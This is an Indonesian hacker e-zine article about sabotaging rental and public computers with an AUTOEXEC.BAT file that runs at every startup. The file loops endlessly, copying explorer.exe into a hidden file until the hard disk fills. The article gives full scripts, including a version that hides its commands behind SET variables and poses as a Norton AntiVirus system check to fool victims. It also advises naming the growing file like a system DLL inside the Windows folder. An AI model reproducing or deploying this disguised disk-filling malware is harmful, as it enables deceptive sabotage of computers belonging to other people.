
	____________________   ___ ___ ________
	\_   _____/\_   ___ \ /   |   \\_____  \
	 |    __)_ /    \  \//    ~    \/   |   \
	 |        \\     \___\    Y    /    |    \
	/_______  / \______  /\___|_  /\_______  /
	        \/         \/       \/         \/


					    .OR.ID
ECHO-ZINE RELEASE
       05

Author: sandal || sandal@myrealbox.com
Online @ www.echo.or.id :: http://ezine.echo.or.id


== CHAOSING AT THE RENTAL OR OTHER PUBLIC COMPUTER ==
     * just for educational purpose only *



terinspirasi tulisan mas y3dips tentang batch programming,
saya melakukan sedikit eksperimen kecil tentang batch file

tujuan dari 'proyek' ini adalah membuat suatu file batch yg
akan dieksekusi setiap startup [autoexec.bat]. dan file ini
berisi perintah untuk menuliskan suatu karakter ke dalam fi
le yang kita tentukan.

menulis ke dalam file, bukankah hal yang biasa? ^_^ memang.
tapi jika kita loop tak terhingga? :D

pemakai komputer hanya akan menyadari bahwa komputernya me-
ngalami masalah dengan startup dan ketika 'masalah'nya bisa
diatasi, dia mengira isi hardisknya cepat habis!

script utamanya adalah sebagai berikut:

:XYZ
ECHO YOUR TEXT >> C:\FILETUJUAN.EKT
GOTO A

dengan demikian, tulisan YOUR TEXT [bisa dirubah sendiri] akan
tersalin sepenuh hati ke file tujuan dalam jumlah tak terhing-
ga [sampai batch proses di matikan dengan menekan Ctrl + C].


SAMPLE OF FULL SCRIPT [filename = AUTOEXEC.BAT]
---------------------

@echo off
cls
:xyz
echo I Was Here >> c:\file_baru.txt
cls
echo.
echo Scandisk is checking system folder and files...
echo Press Ctrl+C to quit.
goto xyz

----------------------


well, tapi cara di atas kurang ampuh untuk menguras harddisk.
cara yang lumayan ampuh adalah dengan mengganti baris:

ECHO I WAS HERE >> C:\FILE_BARU.TXT

menjadi

TYPE C:\WINDOWS\EXPLORER.EXE >> C:\FILE_BARU.TXT

file target berada di root folder C: dan hal ini pasti cepet
ketahuan. karena itu lebih baik file target diletakkan di folder
C:\WINDOWS [atau di C:\WINDOWS\SYSTEM]. karena di folder ini,
tidak mungkin akan ada pemilik komputer yang hapal isinya secara
keseluruhan. :P

beri nama yang... komputer banget. misalnya setLob.dll atau yang
lain, beri ekstensi yang mirip-mirip file penting.

AWAS, cara ini mungkin hanya untuk korban awam banget. untuk kor-
ban yang agak awam [1/2 awam] kita kelabui dengan cara lain. karena
jika tidak kita kelabui, begitu membaca file autoexec.bat dia akan
segera menyadari apa yang terjadi.

kita 'permainkan' dengan menggunakan SET, juga sedikit social engin
eering.


------------- autoexec.bat begin -----------------
@echo off
@rem	NEEDED BY NORTON ANTI VIRUS

@rem	This file generated by Norton Anti Virus 2004 to optimize
@rem	the Virus Protection Performance. DO NOT delete OR modify
@rem	this file.

@echo off

set n=t
set o=yp
set x=dl
set c=set
set e=L
set q=v

:navcheck
%n%%o%e %windir%\explorer.exe >> %windir%\%c%%e%ob.%x%l
cls

echo.
echo NAV 2004 is checking system folder and files...
echo it may take a few second.
echo.
echo If the process not responding,
echo press C%n%rl+C and answer YES.
go%n%o na%q%check

------------------- end of file -------------------

silahkan diutak-atik sendiri biar lebih puas.
ketika saya coba, baru beberapa detik saja sudah dapat
file setLob.dll sebesar -/+ 100 MB!

NOTE:
-----
uji coba menggunakan P4 2.0 GHz 128MB. dicoba di P2 266
64 MB agak lama juga untuk mendapatkan ukuran segitu.

output dari file batch ini adalah file setLob.dll yang
terletak di direktori C:\WINDOWS yang akan selalu ber-
tambah ukurannya.



GRRETZ TO:
----------
- echo staff, of course ^_^
- newbie_hacker
- IKC's
- gembelkuasa.tk's
- MLFC's
- Martia the Alt+003 &_&
- Adikku enly


COMPLAIN TO:
------------
mail: sandal at myrealbox.com
#ICQ: 1275138214 [oddesse]
